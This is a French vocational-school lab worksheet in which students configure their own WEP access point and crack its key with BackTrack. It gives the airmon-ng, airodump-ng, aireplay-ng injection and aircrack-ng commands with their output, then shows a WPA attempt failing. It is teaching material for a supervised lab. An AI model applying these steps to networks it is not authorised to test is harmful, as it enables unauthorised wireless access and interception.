Vous êtes sur la page 1sur 9

CI-11 installation et configuration de systèmes TR

NOM :
LP CHATEAU BLANC
45 – CHALETTE/LOING BAC PRO SEN TR
___________________ CI 11 :
ACADÉMIE D’ORLÉANS-TOURS INSTALLATION ET
THÈME :
LE WIFI CONFIGURATION DE
SYSTEMES TR
OBJECTIFS :
TP N° 2
 EXPLOITER LES FAILLES DE SECURITE D’UN RESEAU WIFI POUR S’Y CONNECTER
Compétences : Savoirs :
C3 ; C4 S0-5.2 ; S3; S4-2 ; S5-1; S5-2
Ressources :
 UN DVD DE BACK TRACK 5
 2 CLES WIFI USB HERCULES HWGUSB2-54 ET SON CD D’INSTALLATION
 2 ORDINATEURS (UN FUJITSU ET VOTRE PC D044-XX)
 UN ROUTEUR WIFI 7LINK
 INTERNET
 LE SUJET DU TP

EXPLOITER LES FAILLES D’UN RESEAU WIFI

1. Présentation du TP

7link

réseau
LAN et WLAN
Fujitsu cartes réseau
Hercules
USB2 sans fil D044-XX
(pirate)

carte réseau
RJ45

2. Configuration du WLAN du 7link

2.1. Branchement et RAZ du 7link


1) Le 7link étant branché au secteur, effectuer sa
remise à zéro, en appuyant 20s sur le bouton
prévu à cet effet :

1SEN-TR  1 
CI-11 installation et configuration de systèmes TR

2) configurer le 7link en mode point d’accès et connecter le port RJ45 du PC


Fujitsu au 7link.

3) Sur le schéma suivant, indiquer les actions à effectuer pour cela :

4) sur la documentation du 7link, retrouver l’@IP par défaut du point d’accès :

192.168.1.254

2.2. Configuration du WLAN


5) A l’aide d’un explorateur internet, se connecter à l’interface de gestion du
7link :

254

6) Aller dans IP config  Wireless.


Configurer le WLAN tel que :

1SEN-TR  2 
CI-11 installation et configuration de systèmes TR
- Le SSID soit : testXX (XX votre numéro de poste)
- L’authentification soit en mode ouvert
- Le type de sécurité/chiffrement soit : WEP 64 bits
- La clé soit : 12345ABCDE

2.3. Connexion au WLAN


7) A l’aide du CD d’installation de la carte réseau Wifi USB2, installer ses drivers.

8) Puis, à l’aide de l’utilitaire Wifi Station, retrouver le réseau testXX dans la


liste des réseaux découverts. Compléter alors le tableau suivant :

@MAC du point
Niveau du signal Canal RF type sécurisé
d’accès

00:d0:41:b4:4e:c5 100% 6 infrastructure Oui (WEP)

9) !!! Connecter l’ordinateur Fujitsu au réseau Wifi testXX. !!!

APPELER LE PROFESSEUR !!
3. Procédure de déchiffrage de la clé WEP du réseau Wifi
10) Consulter les pages web : http://www.crack-wifi.com/tutoriel-crack-wep-
aircrack-ng-backtrack.php et http://blog.alexandredubois.com/2010/09/02/
tuto-cracker-une-cle-wep-backtrack-4r1/

11) A la lecture de ces pages web, compléter l’algorigramme de la page suivante


par :

Lancer un scan des réseaux wifi environnants et choisir un point d’accès cible.
Laisser la fenêtre du terminal ouverte
Dans le 1er terminal, nombre de « data » capturées  50000 ?
Lister les interfaces wifi disponibles sur votre ordinateur
Se faire passer pour un ordinateur (station) déjà connecté au point d’accès et stimuler
le point d’accès
Arrêter la capture des paquets émis.
Passer l’interface désirée en mode monitor.
Capturer les paquets émis par le point d’accès cible.
cracker la clé à partir des données collectées

1SEN-TR  3 
CI-11 installation et configuration de systèmes TR

début

Lister les interfaces wifi disponibles sur


votre ordinateur

Passer l’interface désirée en mode monitor

Lancer un scan des réseaux wifi environnants et choisir un point d’accès cible.

Capturer les paquets émis par le point d’accès cible.

Laisser la fenêtre du terminal ouverte

Se faire passer pour un ordinateur (station) déjà connecté au point d’accès et stimuler le
point d’accès

Dans le 1er terminal,


nombre de « data » capturées
>=
50000?

Arrêter la capture des paquets émis

cracker la clé à partir des données collectées

fin

APPELER LE PROFESSEUR !!

1SEN-TR  4 
CI-11 installation et configuration de systèmes TR
4. Déchiffrage de la clé WEP étapes par étapes
12) Connecter la 2de clé Wifi USB au PC D044-XX et démarrer l’ordinateur en
bootant sur le DVD Back Track. Lancer l’environnement graphique de Back
Track, sans installer le système d’exploitation.

4.1. Passage de l’interface wifi en mode moniteur

Attention : le clavier est en querty !!

13) Configurer le clavier en mode Azerty (system  préférences  keyboard…)


14) dans un terminal, exécuter la commande iwconfig :
root@root:~# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wlan0 IEEE 802.11bg ESSID:off/any


Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
15) Quel est le nom de l’interface réseau sans-fil?

Wlan0

16) A l’aide de la commande : airmon-ng start wlan0, passer cette interface en


mode moniteur.

17) Puis, à l’aide d’un iwconfig, vérifier que l’opération s’est bien déroulée :
root@root:/pentest/wireless/aircrack-ng# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wlan0 IEEE 802.11bg ESSID:off/any


Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on

mon0 IEEE 802.11bg Mode:Monitor Tx-Power=20 dBm


Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:off

4.2. Analyse de l’environnement wifi


Cette étape permet d’analyser les réseaux à portée et les machines connectées. C’est dans
cette étape que l’on va déterminer le réseau dont on veut découvrir la clé WEP.

1SEN-TR  5 
CI-11 installation et configuration de systèmes TR
18) A l’aide de la commande : airodump-ng --encrypt wep mon0, lancer la
surveillance des réseaux encryptés en wep. compléter ci-dessous le résultat
affiché :
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:D0:41:AF:D1:8A -36 58 2 0 6 54 . WEP WEP testXX

BSSID STATION PWR Rate Lost Packets Probes

(not associated) 4C:0F:6E:E7:28:DD -81 0 - 1 0 1


00:D0:41:AF:D1:8A 00:08:D3:08:17:89 -49 54 -54 0 2

19) Sur le résultat précédent, entourer :


– en vert : le SSID de votre réseau wifi testXX
– en rouge : l’@MAC de votre point d’accès
– en bleu : le canal RF utilisé
- en noir : l’@MAC de la station (ordinateur Fujitsu) connectée point d’accès

20) A l’aide de la commande : airodump-ng -w crackXX --channel 6 --bssid


@MAC_point_d'accès mon0 , lancer la capture des paquets émis par le point
d’accès 7link dont le SSID est testXX.

 Le fichier de capture se nommera crackXX (XX étant votre numéro de groupe).

21) !!! Laisser travailler !!! et dans un autre terminal, vérifier que ce fichier est
bien créé : ls .Noter ci-dessous les fichiers contenus dans le répertoire de
root :

crackXX-01.cap crackXX-01.kismet.csv Desktop


crackXX-01.csv crackXX-01.kismet.netxml

4.3. Stimulation du réseau cible


En se faisant passer pour un équipement autorisé, on va forcer le point d’accès cible à
« bavarder » avec notre machine. On récupèrera ainsi un maximum de données émises par
le point d’accès wifi.

22) Lancer un terminal et à l’aide de la commande : aireplay-ng -2 -p 0841 -c


ff:ff:ff:ff:ff:ff -b @MAC_point_d'accès mon0, stimuler le point d’accès
en se faisant passer pour la station connectée.

1SEN-TR  6 
CI-11 installation et configuration de systèmes TR
23) Attendre et vérifier les propositions affichées. Noter ces propositions ci-
dessous :

BSSID = 00:D0:41:AF:D1:8A
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:08:D3:08:17:89

0x0000: 0841 3a01 00d0 41af d18a 0008 d308 1789 .A:...A.........

24) Sur le résultat reporté ci-dessus, entourer l’@MAC correspondant à votre


sation fujitsu.

25) Accepter la proposition en tapant Y (yes)

26) Pour augmenter le nombre de données capturées (Data) dans le premier terminal
laissé ouvert (question 20), il faut simuler un trafic réseau entre Fujitsu et le
point d’accès. Pour cela, depuis Fujitsu, se connecter puis se déconnecter
régulièrement à l’interface Web du point d’accès et observer l’augmentation des
trames capturées dans airodump –ng.

27) Surveiller l’augmentation des données capturées par airodump-ng. Dès qu’elles
atteignent un nombre  50000, stopper l’injection de paquets et la capture en
appuyant sur CTRL + C dans les 2 terminaux.

4.4. Déchiffrage de la clé


Grâce aux données collectées à l’étape précédente, notre programme sera capable
d’analyser la manière dont le point d’accès wifi « discute » avec nous pour en déduire la clé
wep utilisée.

28) Lancer aircrack-ng dans un terminal et procéder au déchiffrage de la clé WEP


du réseau testXX. Noter la commande (voir sites Web) et son résultat ci-
dessous :
root@root~# aircrack-ng crackXX-01.cap
Opening crackXX-01.cap
Read 870621 packets.

# BSSID ESSID Encryption

1 00:D0:41:AF:D1:8A testXX WEP (50267 IVs)

Choosing first network as target.

Opening crackXX-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50267 ivs.
KEY FOUND! [ 12:34:5A:BC:DE ]
Decrypted correctly: 100%

1SEN-TR  7 
CI-11 installation et configuration de systèmes TR
5. Pour le plus rapides
29) Configurer le WLAN tel que :
- Le SSID soit caché
- L’authentification soit en mode partagé
- Le type de sécurité/chiffrement soit : WPA-PSK (TKIP)
- La clé soit : wpa1senXX ((XX votre numéro de poste)
Sur la copie d’écran ci-dessous, indiquer vos paramètres :

TESTXX

30) Appliquer les modifications et redémarrer le point d’accès :

31) Pour pouvoir connecter le PC Fujitsu, en wifi, au WLAN, il faut ajouter


manuellement le réseau 1SENXX dans la liste de ses réseaux favoris. En effet
le SSID étant caché, ce réseau ne peut pas être découvert automatiquement.
Pour cela :

1SEN-TR  8 
CI-11 installation et configuration de systèmes TR

Compléter l’ensemble
des informations ci-
dessous

1) A l’aide du PC D044-XX et Back Track, procéder au « crackage » de la clé


WPA. Que peut-on constater ?

Le nombre de données (data) capturées par airodump –n g est quasi nul


 on ne peut pas cracker la clé.

1SEN-TR  9 

Vous aimerez peut-être aussi